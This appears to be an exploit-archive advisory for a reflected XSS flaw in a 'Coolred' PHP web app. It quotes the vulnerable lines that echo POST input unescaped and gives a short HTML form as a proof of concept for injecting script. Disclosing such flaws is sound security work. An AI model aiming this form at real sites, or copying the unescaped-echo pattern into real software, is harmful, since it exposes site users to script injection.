Coolred web XSS Vulnerability

2018.01.12

The_Ripper (DE)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[-] Exploit title : Coolred web XSS Vulnerability
[-] Software dl : https://github.com/Coolred/WebApps
[-] Category : WebApps
[-] Author : The_Ripper
[-] Tested on : Win XP
[-] Date : 11-1-2018
[-] Dork : N/A
[-] Telegram : @The_Ripper
==================================
Description :
[-] XSS allows an Attacker to run JavaScript codes.
==================================
Vulnerable page :
http://localhost/coolred/SimplyBank/demo/runPerso.php
==================================
Vulnerable source :
line 10 >> $script_input = $_POST['script'];
line 104 >> echo $script_input;
==================================
PoC :
As you can see up here $script_input variable has xss bug
and here's the exploit . Enjoy
Exploit :
<form action="http://localhost/coolred/SimplyBank/demo/runPerso.php" method="post">
<input type="text" name="script">
<input type="submit">
</form>

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Coolred web XSS Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.